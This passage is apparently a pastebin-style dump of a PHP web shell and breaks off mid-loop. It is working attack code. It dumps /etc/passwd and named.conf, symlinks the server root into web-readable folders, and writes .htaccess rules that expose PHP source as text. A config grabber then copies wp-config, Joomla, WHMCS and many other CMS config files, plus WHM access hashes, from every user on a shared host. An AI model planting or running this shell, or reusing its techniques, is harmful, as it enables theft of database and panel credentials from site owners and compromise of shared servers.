  633. echo "</br><a href='?path=$path&bypass=disablefunc'>Disable Functions</a></br><a href='?path=$path&bypass=passwd'>Bypass /etc/passwd</a></br><a href='?path=$path&bypass=vhosts'>Bypass Vhosts</a></div>";
  634. } elseif($_GET['symlink'] == 'tool'){
  635. echo "<div id='menu'><center>";
  636. echo "</br></br><a href='?path=$path&symlink=server'>Symlink Server </a></br><a href='?path=$path&symlink=404'>Symlink 404</a></br><a href='?path=$path&symlink=python'>Bypass Symlink Python</a></div>";
  637. } elseif ($_GET['symlink'] == '404'){
  638. @error_reporting(0);
  639. @ini_set('display_errors', 0);
  640. echo "<div id='menu'></br><center><a href='?path=$path&symlink=server'>Symlink Server </a></br><a href='?path=$path&symlink=404'>Symlink 404</a></br><a href='?path=$path&symlink=python'>Bypass Symlink Python</a></div>";
  641. echo '<center><b><a href="https://www.facebook.com/jembut.go.id">Coded By Arvan Apriyana</a></b><br>
  642. <form method="post"><br>File Target : <input name="dir" value="/home/user/public_html/wp-config.php">
  643. <br>
  644. <br>Save As: <input name="jnck" value="ojayakan.txt"><input name="ojaykan" type="submit" value="Eksekusi Gan"></form><br>';
  645. if($_POST['ojaykan']){
  646. rmdir("tatsumi_symlink404");mkdir("tatsumi_symlink404", 0777);
  647. $dir = $_POST['dir'];
  648. $jnck = $_POST['jnck'];
  649. system("ln -s ".$dir." tatsumi_symlink404/".$jnck);
  650. symlink($dir,"tatsumi_symlink404/".$jnck);
  651. $inija = fopen("tatsumi_symlink404/.htaccess", "w");
  652. fwrite($inija,"ReadmeName ".$jnck."
  653. Options Indexes FollowSymLinks
  654. DirectoryIndex ngeue.htm
  655. AddType text/plain .php
  656. AddHandler text/plain .php
  657. Satisfy Any
  658. ");
  659. echo'<a href="tatsumi_symlink404/" target="_blank">Klik Gan >:(</a>';
  660. }
  661. }elseif($_GET['bypass'] == 'passwd') {
  662. echo '<div id="menu"><center></br><a href="?path=$path&bypass=disablefunc">Disable Functions</a></br><a href="?path=$path&bypass=passwd">Bypass /etc/passwd</a></br><a href="?path=$path&bypass=vhosts">Bypass Vhosts</a></div>';
  663. echo '<br><br><center>Bypass etc/passw With:<br>
  664. <table style="width:50%">
  665. <tr>
  666. <td><form method="post"><input type="submit" value="System Function" name="syst"></form></td>
  667. <td><form method="post"><input type="submit" value="Passthru Function" name="passth"></form></td>
  668. <td><form method="post"><input type="submit" value="Exec Function" name="ex"></form></td>
  669. <td><form method="post"><input type="submit" value="Shell_exec Function" name="shex"></form></td>
  670. <td><form method="post"><input type="submit" value="Posix_getpwuid Function" name="melex"></form></td>
  671. </tr></table>Bypass User With : <table style="width:50%">
  672. <tr>
  673. <td><form method="post"><input type="submit" value="Awk Program" name="awkuser"></form></td>
  674. <td><form method="post"><input type="submit" value="System Function" name="systuser"></form></td>
  675. <td><form method="post"><input type="submit" value="Passthru Function" name="passthuser"></form></td>
  676. <td><form method="post"><input type="submit" value="Exec Function" name="exuser"></form></td>
  677. <td><form method="post"><input type="submit" value="Shell_exec Function" name="shexuser"></form></td>
  678. </tr>
  679. </table><br>';
  680.  
  681.  
  682. if ($_POST['awkuser']) {
  683. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  684. echo shell_exec("awk -F: '{ print $1 }' /etc/passwd | sort");
  685. echo "</textarea><br>";
  686. }
  687. if ($_POST['systuser']) {
  688. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  689. echo system("ls /var/mail");
  690. echo "</textarea><br>";
  691. }
  692. if ($_POST['passthuser']) {
  693. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  694. echo passthru("ls /var/mail");
  695. echo "</textarea><br>";
  696. }
  697. if ($_POST['exuser']) {
  698. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  699. echo exec("ls /var/mail");
  700. echo "</textarea><br>";
  701. }
  702. if ($_POST['shexuser']) {
  703. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  704. echo shell_exec("ls /var/mail");
  705. echo "</textarea><br>";
  706. }
  707. if($_POST['syst'])
  708. {
  709. echo"<textarea class='inputz' cols='65' rows='15'>";
  710. echo system("cat /etc/passwd");
  711. echo"</textarea><br><br><b></b><br>";
  712. }
  713. if($_POST['passth'])
  714. {
  715. echo"<textarea class='inputz' cols='65' rows='15'>";
  716. echo passthru("cat /etc/passwd");
  717. echo"</textarea><br><br><b></b><br>";
  718. }
  719. if($_POST['ex'])
  720. {
  721. echo"<textarea class='inputz' cols='65' rows='15'>";
  722. echo exec("cat /etc/passwd");
  723. echo"</textarea><br><br><b></b><br>";
  724. }
  725. if($_POST['shex'])
  726. {
  727. echo"<textarea class='inputz' cols='65' rows='15'>";
  728. echo shell_exec("cat /etc/passwd");
  729. echo"</textarea><br><br><b></b><br>";
  730. }
  731. echo '<center>';
  732. if($_POST['melex'])
  733. {
  734. echo"<textarea class='inputz' cols='65' rows='15'>";
  735. for($uid=0;$uid<60000;$uid++){
  736. $ara = posix_getpwuid($uid);
  737. if (!empty($ara)) {
  738. while (list ($key, $val) = each($ara)){
  739. print "$val:";
  740. }
  741. print "\n";
  742. }
  743. }
  744. echo"</textarea><br><br>";
  745. }
  746. } elseif($_GET['kill'] == 'self') {
  747. if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))
  748. die('<center><br><center><h2>Shell removed</h2><br>Goodbye , Thanks for take my shell today</center></center>');
  749. else
  750. echo '<center>unlink failed!</center>';
  751. }
  752. elseif($_GET['symlink'] == 'server') {
  753. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $path);
  754. $d0mains = @file("/etc/named.conf");
  755. ##httaces
  756. if($d0mains){
  757. @mkdir("tatsumi_sym",0777);
  758. @chdir("tatsumi_sym");
  759. @exe("ln -s / root");
  760. $file3 = 'Options Indexes FollowSymLinks
  761. DirectoryIndex tatsumi.htm
  762. AddType text/plain .php
  763. AddHandler text/plain .php
  764. Satisfy Any';
  765. $fp3 = fopen('.htaccess','w');
  766. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  767. echo "<div id='menu'><center></br><a href='?path=$path&symlink=server'>Symlink Server</a><a href='?path=$path&symlink=404'>Symlink 404</a></br><a href='?path=$path&symlink=python'>Bypass Symlink Python</a></br></div>";
  768. echo "<br>
  769. <table align=center border=1 style='width:60%;border-color:#333333;'>
  770. <tr>
  771. <td align=center><font size=2>S. No.</font></td>
  772. <td align=center><font size=2>Domains</font></td>
  773. <td align=center><font size=2>Users</font></td>
  774. <td align=center><font size=2>Symlink</font></td>
  775. </tr>";
  776. $dcount = 1;
  777. foreach($d0mains as $d0main){
  778. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
  779. flush();
  780. if(strlen(trim($domains[1][0])) > 2){
  781. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
  782. echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
  783. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
  784. <td>".$user['name']."</td>
  785. <td><a href='$full/tatsumi_sym/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
  786. flush();
  787. $dcount++;}}}
  788. echo "</table>";
  789. }else{
  790. $TEST=@file('/etc/passwd');
  791. if ($TEST){
  792. @mkdir("tatsumi_sym",0777);
  793. @chdir("tatsumi_sym");
  794. exe("ln -s / root");
  795. $file3 = 'Options Indexes FollowSymLinks
  796. DirectoryIndex tatsumi.htm
  797. AddType text/plain .php
  798. AddHandler text/plain .php
  799. Satisfy Any';
  800. $fp3 = fopen('.htaccess','w');
  801. $fw3 = fwrite($fp3,$file3);
  802. @fclose($fp3);
  803. echo "
  804. <table align=center border=1><tr>
  805. <td align=center><font size=3>S. No.</font></td>
  806. <td align=center><font size=3>Users</font></td>
  807. <td align=center><font size=3>Symlink</font></td></tr>";
  808. $dcount = 1;
  809. $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
  810. while(!feof($file)){
  811. $s = fgets($file);
  812. $matches = array();
  813. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  814. $matches = str_replace("home/","",$matches[1]);
  815. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  816. continue;
  817. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  818. <td align=center><font class=txt>" . $matches . "</td>";
  819. echo "<td align=center><font class=txt><a href=$full/tatsumi_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  820. $dcount++;}fclose($file);
  821. echo "</table>";}else{if($os != "Windows"){@mkdir("tatsumi_sym",0777);@chdir("tatsumi_sym");@exe("ln -s / root");$file3 = '
  822. Options Indexes FollowSymLinks
  823. DirectoryIndex tatsumi.htm
  824. AddType text/plain .php
  825. AddHandler text/plain .php
  826. Satisfy Any
  827. ';
  828. $fp3 = fopen('.htaccess','w');
  829. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  830. echo "
  831. <div class='mybox'><h2 class='k2ll33d2'>server symlinker</h2>
  832. <table align=center border=1><tr>
  833. <td align=center><font size=3>ID</font></td>
  834. <td align=center><font size=3>Users</font></td>
  835. <td align=center><font size=3>Symlink</font></td></tr>";
  836. $temp = "";$val1 = 0;$val2 = 1000;
  837. for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
  838. if ($uid)$temp .= join(':',$uid)."\n";}
  839. echo '<br/>';$temp = trim($temp);$file5 =
  840. fopen("test.txt","w");
  841. fputs($file5,$temp);
  842. fclose($file5);$dcount = 1;$file =
  843. fopen("test.txt", "r") or exit("Unable to open file!");
  844. while(!feof($file)){$s = fgets($file);$matches = array();
  845. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
  846. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  847. continue;
  848. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  849. <td align=center><font class=txt>" . $matches . "</td>";
  850. echo "<td align=center><font class=txt><a href=$full/tatsumi_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  851. $dcount++;}
  852. fclose($file);
  853. echo "</table></div></center>";unlink("test.txt");
  854. } else
  855. echo "<center><font size=3>Cannot create Symlink</font></center>";
  856. }
  857. }
  858. } elseif($_GET['config'] == 'grabber') {
  859. if(strtolower(substr(PHP_OS, 0, 3)) == "win"){
  860. echo '<script>alert("Tidak bisa di gunakan di server windows")</script>';
  861. exit;
  862. }
  863. if($_POST){ if($_POST['config'] == 'symvhosts') {
  864. @mkdir("tatsumi_symvhosts", 0777);
  865. exe("ln -s / tatsumi_symvhosts/root");
  866. $htaccess="Options Indexes FollowSymLinks
  867. DirectoryIndex tatsumi.htm
  868. AddType text/plain .php
  869. AddHandler text/plain .php
  870. Satisfy Any";
  871. @file_put_contents("tatsumi_symvhosts/.htaccess",$htaccess);
  872. $etc_passwd=$_POST['passwd'];
  873.  
  874. $etc_passwd=explode("\n",$etc_passwd);
  875. foreach($etc_passwd as $passwd){
  876. $pawd=explode(":",$passwd);
  877. $user =$pawd[5];
  878. $jembod = preg_replace('/\/var\/www\/vhosts\//', '', $user);
  879. if (preg_match('/vhosts/i',$user)){
  880. exe("ln -s ".$user."/httpdocs/wp-config.php tatsumi_symvhosts/".$jembod."-Wordpress.txt");
  881. exe("ln -s ".$user."/httpdocs/configuration.php tatsumi_symvhosts/".$jembod."-Joomla.txt");
  882. exe("ln -s ".$user."/httpdocs/config/koneksi.php tatsumi_symvhosts/".$jembod."-Lokomedia.txt");
  883. exe("ln -s ".$user."/httpdocs/forum/config.php tatsumi_symvhosts/".$jembod."-phpBB.txt");
  884. exe("ln -s ".$user."/httpdocs/sites/default/settings.php tatsumi_symvhosts/".$jembod."-Drupal.txt");
  885. exe("ln -s ".$user."/httpdocs/config/settings.inc.php tatsumi_symvhosts/".$jembod."-PrestaShop.txt");
  886. exe("ln -s ".$user."/httpdocs/app/etc/local.xml tatsumi_symvhosts/".$jembod."-Magento.txt");
  887. exe("ln -s ".$user."/httpdocs/admin/config.php tatsumi_symvhosts/".$jembod."-OpenCart.txt");
  888. exe("ln -s ".$user."/httpdocs/application/config/database.php tatsumi_symvhosts/".$jembod."-Ellislab.txt");
  889. }}}
  890. if($_POST['config'] == 'symlink') {
  891. @mkdir("tatsumi_symconfig", 0777);
  892. @symlink("/","tatsumi_symconfig/root");
  893. $htaccess="Options Indexes FollowSymLinks
  894. DirectoryIndex tatsumi.htm
  895. AddType text/plain .php
  896. AddHandler text/plain .php
  897. Satisfy Any";
  898. @file_put_contents("tatsumi_symconfig/.htaccess",$htaccess);}
  899. if($_POST['config'] == '404') {
  900. @mkdir("tatsumi_sym404", 0777);
  901. @symlink("/","tatsumi_sym404/root");
  902. $htaccess="Options Indexes FollowSymLinks
  903. DirectoryIndex tatsumi.htm
  904. AddType text/plain .php
  905. AddHandler text/plain .php
  906. Satisfy Any
  907. IndexOptions +Charset=UTF-8 +FancyIndexing +IgnoreCase +FoldersFirst +XHTML +HTMLTable +SuppressRules +SuppressDescription +NameWidth=*
  908. IndexIgnore *.txt404
  909. RewriteEngine On
  910. RewriteCond %{REQUEST_FILENAME} ^.*tatsumi_sym404 [NC]
  911. RewriteRule \.txt$ %{REQUEST_URI}404 [L,R=302.NC]";
  912. @file_put_contents("tatsumi_sym404/.htaccess",$htaccess);
  913. }
  914. if($_POST['config'] == 'grab') {
  915. mkdir("tatsumi_configgrab", 0777);
  916. $isi_htc = "Options all\nRequire None\nSatisfy Any";
  917. $htc = fopen("tatsumi_configgrab/.htaccess","w");
  918. fwrite($htc, $isi_htc);
  919. }
  920. $passwd = $_POST['passwd'];
  921.  
  922. preg_match_all('/(.*?):x:/', $passwd, $user_config);
  923. foreach($user_config[1] as $user_tatsumi) {
  924. $grab_config = array(
  925. "/home/$user_tatsumi/.accesshash" => "WHM-accesshash",
  926. "/home/$user_tatsumi/public_html/config/koneksi.php" => "Lokomedia",
  927. "/home/$user_tatsumi/public_html/forum/config.php" => "phpBB",
  928. "/home/$user_tatsumi/public_html/sites/default/settings.php" => "Drupal",
  929. "/home/$user_tatsumi/public_html/config/settings.inc.php" => "PrestaShop",
  930. "/home/$user_tatsumi/public_html/app/etc/local.xml" => "Magento",
  931. "/home/$user_tatsumi/public_html/admin/config.php" => "OpenCart",
  932. "/home/$user_tatsumi/public_html/application/config/database.php" => "Ellislab",
  933. "/home/$user_tatsumi/public_html/vb/includes/config.php" => "Vbulletin",
  934. "/home/$user_tatsumi/public_html/includes/config.php" => "Vbulletin",
  935. "/home/$user_tatsumi/public_html/forum/includes/config.php" => "Vbulletin",
  936. "/home/$user_tatsumi/public_html/forums/includes/config.php" => "Vbulletin",
  937. "/home/$user_tatsumi/public_html/cc/includes/config.php" => "Vbulletin",
  938. "/home/$user_tatsumi/public_html/inc/config.php" => "MyBB",
  939. "/home/$user_tatsumi/public_html/includes/configure.php" => "OsCommerce",
  940. "/home/$user_tatsumi/public_html/shop/includes/configure.php" => "OsCommerce",
  941. "/home/$user_tatsumi/public_html/os/includes/configure.php" => "OsCommerce",
  942. "/home/$user_tatsumi/public_html/oscom/includes/configure.php" => "OsCommerce",
  943. "/home/$user_tatsumi/public_html/products/includes/configure.php" => "OsCommerce",
  944. "/home/$user_tatsumi/public_html/cart/includes/configure.php" => "OsCommerce",
  945. "/home/$user_tatsumi/public_html/inc/conf_global.php" => "IPB",
  946. "/home/$user_tatsumi/public_html/wp-config.php" => "Wordpress",
  947. "/home/$user_tatsumi/public_html/wp/test/wp-config.php" => "Wordpress",
  948. "/home/$user_tatsumi/public_html/blog/wp-config.php" => "Wordpress",
  949. "/home/$user_tatsumi/public_html/beta/wp-config.php" => "Wordpress",
  950. "/home/$user_tatsumi/public_html/portal/wp-config.php" => "Wordpress",
  951. "/home/$user_tatsumi/public_html/site/wp-config.php" => "Wordpress",
  952. "/home/$user_tatsumi/public_html/wp/wp-config.php" => "Wordpress",
  953. "/home/$user_tatsumi/public_html/WP/wp-config.php" => "Wordpress",
  954. "/home/$user_tatsumi/public_html/news/wp-config.php" => "Wordpress",
  955. "/home/$user_tatsumi/public_html/wordpress/wp-config.php" => "Wordpress",
  956. "/home/$user_tatsumi/public_html/test/wp-config.php" => "Wordpress",
  957. "/home/$user_tatsumi/public_html/demo/wp-config.php" => "Wordpress",
  958. "/home/$user_tatsumi/public_html/home/wp-config.php" => "Wordpress",
  959. "/home/$user_tatsumi/public_html/v1/wp-config.php" => "Wordpress",
  960. "/home/$user_tatsumi/public_html/v2/wp-config.php" => "Wordpress",
  961. "/home/$user_tatsumi/public_html/press/wp-config.php" => "Wordpress",
  962. "/home/$user_tatsumi/public_html/new/wp-config.php" => "Wordpress",
  963. "/home/$user_tatsumi/public_html/blogs/wp-config.php" => "Wordpress",
  964. "/home/$user_tatsumi/public_html/configuration.php" => "Joomla",
  965. "/home/$user_tatsumi/public_html/blog/configuration.php" => "Joomla",
  966. "/home/$user_tatsumi/public_html/submitticket.php" => "^WHMCS",
  967. "/home/$user_tatsumi/public_html/cms/configuration.php" => "Joomla",
  968. "/home/$user_tatsumi/public_html/beta/configuration.php" => "Joomla",
  969. "/home/$user_tatsumi/public_html/portal/configuration.php" => "Joomla",
  970. "/home/$user_tatsumi/public_html/site/configuration.php" => "Joomla",
  971. "/home/$user_tatsumi/public_html/main/configuration.php" => "Joomla",
  972. "/home/$user_tatsumi/public_html/home/configuration.php" => "Joomla",
  973. "/home/$user_tatsumi/public_html/demo/configuration.php" => "Joomla",
  974. "/home/$user_tatsumi/public_html/test/configuration.php" => "Joomla",
  975. "/home/$user_tatsumi/public_html/v1/configuration.php" => "Joomla",
  976. "/home/$user_tatsumi/public_html/v2/configuration.php" => "Joomla",
  977. "/home/$user_tatsumi/public_html/joomla/configuration.php" => "Joomla",
  978. "/home/$user_tatsumi/public_html/new/configuration.php" => "Joomla",
  979. "/home/$user_tatsumi/public_html/WHMCS/submitticket.php" => "WHMCS",
  980. "/home/$user_tatsumi/public_html/whmcs1/submitticket.php" => "WHMCS",
  981. "/home/$user_tatsumi/public_html/Whmcs/submitticket.php" => "WHMCS",
  982. "/home/$user_tatsumi/public_html/whmcs/submitticket.php" => "WHMCS",
  983. "/home/$user_tatsumi/public_html/whmcs/submitticket.php" => "WHMCS",
  984. "/home/$user_tatsumi/public_html/WHMC/submitticket.php" => "WHMCS",
  985. "/home/$user_tatsumi/public_html/Whmc/submitticket.php" => "WHMCS",
  986. "/home/$user_tatsumi/public_html/whmc/submitticket.php" => "WHMCS",
  987. "/home/$user_tatsumi/public_html/WHM/submitticket.php" => "WHMCS",
  988. "/home/$user_tatsumi/public_html/Whm/submitticket.php" => "WHMCS",
  989. "/home/$user_tatsumi/public_html/whm/submitticket.php" => "WHMCS",
  990. "/home/$user_tatsumi/public_html/HOST/submitticket.php" => "WHMCS",
  991. "/home/$user_tatsumi/public_html/Host/submitticket.php" => "WHMCS",
  992. "/home/$user_tatsumi/public_html/host/submitticket.php" => "WHMCS",
  993. "/home/$user_tatsumi/public_html/SUPPORTES/submitticket.php" => "WHMCS",
  994. "/home/$user_tatsumi/public_html/Supportes/submitticket.php" => "WHMCS",
  995. "/home/$user_tatsumi/public_html/supportes/submitticket.php" => "WHMCS",
  996. "/home/$user_tatsumi/public_html/domains/submitticket.php" => "WHMCS",
  997. "/home/$user_tatsumi/public_html/domain/submitticket.php" => "WHMCS",
  998. "/home/$user_tatsumi/public_html/Hosting/submitticket.php" => "WHMCS",
  999. "/home/$user_tatsumi/public_html/HOSTING/submitticket.php" => "WHMCS",
  1000. "/home/$user_tatsumi/public_html/hosting/submitticket.php" => "WHMCS",
  1001. "/home/$user_tatsumi/public_html/CART/submitticket.php" => "WHMCS",
  1002. "/home/$user_tatsumi/public_html/Cart/submitticket.php" => "WHMCS",
  1003. "/home/$user_tatsumi/public_html/cart/submitticket.php" => "WHMCS",
  1004. "/home/$user_tatsumi/public_html/ORDER/submitticket.php" => "WHMCS",
  1005. "/home/$user_tatsumi/public_html/Order/submitticket.php" => "WHMCS",
  1006. "/home/$user_tatsumi/public_html/order/submitticket.php" => "WHMCS",
  1007. "/home/$user_tatsumi/public_html/CLIENT/submitticket.php" => "WHMCS",
  1008. "/home/$user_tatsumi/public_html/Client/submitticket.php" => "WHMCS",
  1009. "/home/$user_tatsumi/public_html/client/submitticket.php" => "WHMCS",
  1010. "/home/$user_tatsumi/public_html/CLIENTAREA/submitticket.php" => "WHMCS",
  1011. "/home/$user_tatsumi/public_html/Clientarea/submitticket.php" => "WHMCS",
  1012. "/home/$user_tatsumi/public_html/clientarea/submitticket.php" => "WHMCS",
  1013. "/home/$user_tatsumi/public_html/SUPPORT/submitticket.php" => "WHMCS",
  1014. "/home/$user_tatsumi/public_html/Support/submitticket.php" => "WHMCS",
  1015. "/home/$user_tatsumi/public_html/support/submitticket.php" => "WHMCS",
  1016. "/home/$user_tatsumi/public_html/BILLING/submitticket.php" => "WHMCS",
  1017. "/home/$user_tatsumi/public_html/Billing/submitticket.php" => "WHMCS",
  1018. "/home/$user_tatsumi/public_html/billing/submitticket.php" => "WHMCS",
  1019. "/home/$user_tatsumi/public_html/BUY/submitticket.php" => "WHMCS",
  1020. "/home/$user_tatsumi/public_html/Buy/submitticket.php" => "WHMCS",
  1021. "/home/$user_tatsumi/public_html/buy/submitticket.php" => "WHMCS",
  1022. "/home/$user_tatsumi/public_html/MANAGE/submitticket.php" => "WHMCS",
  1023. "/home/$user_tatsumi/public_html/Manage/submitticket.php" => "WHMCS",
  1024. "/home/$user_tatsumi/public_html/manage/submitticket.php" => "WHMCS",
  1025. "/home/$user_tatsumi/public_html/CLIENTSUPPORT/submitticket.php" => "WHMCS",
  1026. "/home/$user_tatsumi/public_html/ClientSupport/submitticket.php" => "WHMCS",
  1027. "/home/$user_tatsumi/public_html/Clientsupport/submitticket.php" => "WHMCS",
  1028. "/home/$user_tatsumi/public_html/clientsupport/submitticket.php" => "WHMCS",
  1029. "/home/$user_tatsumi/public_html/CHECKOUT/submitticket.php" => "WHMCS",
  1030. "/home/$user_tatsumi/public_html/Checkout/submitticket.php" => "WHMCS",
  1031. "/home/$user_tatsumi/public_html/checkout/submitticket.php" => "WHMCS",
  1032. "/home/$user_tatsumi/public_html/BILLINGS/submitticket.php" => "WHMCS",
  1033. "/home/$user_tatsumi/public_html/Billings/submitticket.php" => "WHMCS",
  1034. "/home/$user_tatsumi/public_html/billings/submitticket.php" => "WHMCS",
  1035. "/home/$user_tatsumi/public_html/BASKET/submitticket.php" => "WHMCS",
  1036. "/home/$user_tatsumi/public_html/Basket/submitticket.php" => "WHMCS",
  1037. "/home/$user_tatsumi/public_html/basket/submitticket.php" => "WHMCS",
  1038. "/home/$user_tatsumi/public_html/SECURE/submitticket.php" => "WHMCS",
  1039. "/home/$user_tatsumi/public_html/Secure/submitticket.php" => "WHMCS",
  1040. "/home/$user_tatsumi/public_html/secure/submitticket.php" => "WHMCS",
  1041. "/home/$user_tatsumi/public_html/SALES/submitticket.php" => "WHMCS",
  1042. "/home/$user_tatsumi/public_html/Sales/submitticket.php" => "WHMCS",
  1043. "/home/$user_tatsumi/public_html/sales/submitticket.php" => "WHMCS",
  1044. "/home/$user_tatsumi/public_html/BILL/submitticket.php" => "WHMCS",
  1045. "/home/$user_tatsumi/public_html/Bill/submitticket.php" => "WHMCS",
  1046. "/home/$user_tatsumi/public_html/bill/submitticket.php" => "WHMCS",
  1047. "/home/$user_tatsumi/public_html/PURCHASE/submitticket.php" => "WHMCS",
  1048. "/home/$user_tatsumi/public_html/Purchase/submitticket.php" => "WHMCS",
  1049. "/home/$user_tatsumi/public_html/purchase/submitticket.php" => "WHMCS",
  1050. "/home/$user_tatsumi/public_html/ACCOUNT/submitticket.php" => "WHMCS",
  1051. "/home/$user_tatsumi/public_html/Account/submitticket.php" => "WHMCS",
  1052. "/home/$user_tatsumi/public_html/account/submitticket.php" => "WHMCS",
  1053. "/home/$user_tatsumi/public_html/USER/submitticket.php" => "WHMCS",
  1054. "/home/$user_tatsumi/public_html/User/submitticket.php" => "WHMCS",
  1055. "/home/$user_tatsumi/public_html/user/submitticket.php" => "WHMCS",
  1056. "/home/$user_tatsumi/public_html/CLIENTS/submitticket.php" => "WHMCS",
  1057. "/home/$user_tatsumi/public_html/Clients/submitticket.php" => "WHMCS",
  1058. "/home/$user_tatsumi/public_html/clients/submitticket.php" => "WHMCS",
  1059. "/home/$user_tatsumi/public_html/BILLINGS/submitticket.php" => "WHMCS",
  1060. "/home/$user_tatsumi/public_html/Billings/submitticket.php" => "WHMCS",
  1061. "/home/$user_tatsumi/public_html/billings/submitticket.php" => "WHMCS",
  1062. "/home/$user_tatsumi/public_html/MY/submitticket.php" => "WHMCS",
  1063. "/home/$user_tatsumi/public_html/My/submitticket.php" => "WHMCS",
  1064. "/home/$user_tatsumi/public_html/my/submitticket.php" => "WHMCS",
  1065. "/home/$user_tatsumi/public_html/secure/whm/submitticket.php" => "WHMCS",
  1066. "/home/$user_tatsumi/public_html/secure/whmcs/submitticket.php" => "WHMCS",
  1067. "/home/$user_tatsumi/public_html/panel/submitticket.php" => "WHMCS",
  1068. "/home/$user_tatsumi/public_html/clientes/submitticket.php" => "WHMCS",
  1069. "/home/$user_tatsumi/public_html/cliente/submitticket.php" => "WHMCS",
  1070. "/home/$user_tatsumi/public_html/support/order/submitticket.php" => "WHMCS",
  1071. "/home/$user_tatsumi/public_html/bb-config.php" => "BoxBilling",
  1072. "/home/$user_tatsumi/public_html/boxbilling/bb-config.php" => "BoxBilling",
  1073. "/home/$user_tatsumi/public_html/box/bb-config.php" => "BoxBilling",
  1074. "/home/$user_tatsumi/public_html/host/bb-config.php" => "BoxBilling",
  1075. "/home/$user_tatsumi/public_html/Host/bb-config.php" => "BoxBilling",
  1076. "/home/$user_tatsumi/public_html/supportes/bb-config.php" => "BoxBilling",
  1077. "/home/$user_tatsumi/public_html/support/bb-config.php" => "BoxBilling",
  1078. "/home/$user_tatsumi/public_html/hosting/bb-config.php" => "BoxBilling",
  1079. "/home/$user_tatsumi/public_html/cart/bb-config.php" => "BoxBilling",
  1080. "/home/$user_tatsumi/public_html/order/bb-config.php" => "BoxBilling",
  1081. "/home/$user_tatsumi/public_html/client/bb-config.php" => "BoxBilling",
  1082. "/home/$user_tatsumi/public_html/clients/bb-config.php" => "BoxBilling",
  1083. "/home/$user_tatsumi/public_html/cliente/bb-config.php" => "BoxBilling",
  1084. "/home/$user_tatsumi/public_html/clientes/bb-config.php" => "BoxBilling",
  1085. "/home/$user_tatsumi/public_html/billing/bb-config.php" => "BoxBilling",
  1086. "/home/$user_tatsumi/public_html/billings/bb-config.php" => "BoxBilling",
  1087. "/home/$user_tatsumi/public_html/my/bb-config.php" => "BoxBilling",
  1088. "/home/$user_tatsumi/public_html/secure/bb-config.php" => "BoxBilling",
  1089. "/home/$user_tatsumi/public_html/support/order/bb-config.php" => "BoxBilling",
  1090. "/home/$user_tatsumi/public_html/includes/dist-configure.php" => "Zencart",
  1091. "/home/$user_tatsumi/public_html/zencart/includes/dist-configure.php" => "Zencart",
  1092. "/home/$user_tatsumi/public_html/products/includes/dist-configure.php" => "Zencart",
  1093. "/home/$user_tatsumi/public_html/cart/includes/dist-configure.php" => "Zencart",
  1094. "/home/$user_tatsumi/public_html/shop/includes/dist-configure.php" => "Zencart",
  1095. "/home/$user_tatsumi/public_html/includes/iso4217.php" => "Hostbills",
  1096. "/home/$user_tatsumi/public_html/hostbills/includes/iso4217.php" => "Hostbills",
  1097. "/home/$user_tatsumi/public_html/host/includes/iso4217.php" => "Hostbills",
  1098. "/home/$user_tatsumi/public_html/Host/includes/iso4217.php" => "Hostbills",
  1099. "/home/$user_tatsumi/public_html/supportes/includes/iso4217.php" => "Hostbills",
  1100. "/home/$user_tatsumi/public_html/support/includes/iso4217.php" => "Hostbills",
  1101. "/home/$user_tatsumi/public_html/hosting/includes/iso4217.php" => "Hostbills",
  1102. "/home/$user_tatsumi/public_html/cart/includes/iso4217.php" => "Hostbills",
  1103. "/home/$user_tatsumi/public_html/order/includes/iso4217.php" => "Hostbills",
  1104. "/home/$user_tatsumi/public_html/client/includes/iso4217.php" => "Hostbills",
  1105. "/home/$user_tatsumi/public_html/clients/includes/iso4217.php" => "Hostbills",
  1106. "/home/$user_tatsumi/public_html/cliente/includes/iso4217.php" => "Hostbills",
  1107. "/home/$user_tatsumi/public_html/clientes/includes/iso4217.php" => "Hostbills",
  1108. "/home/$user_tatsumi/public_html/billing/includes/iso4217.php" => "Hostbills",
  1109. "/home/$user_tatsumi/public_html/billings/includes/iso4217.php" => "Hostbills",
  1110. "/home/$user_tatsumi/public_html/my/includes/iso4217.php" => "Hostbills",
  1111. "/home/$user_tatsumi/public_html/secure/includes/iso4217.php" => "Hostbills",
  1112. "/home/$user_tatsumi/public_html/support/order/includes/iso4217.php" => "Hostbills"
  1113. );
  1114.  
  1115. foreach($grab_config as $config => $nama_config) {
  1116. if($_POST['config'] == 'grab') {
  1117. $ambil_config = file_get_contents($config);
  1118. if($ambil_config == '') {
  1119. } else {
  1120. $file_config = fopen("tatsumi_configgrab/$user_tatsumi-$nama_config.txt","w");
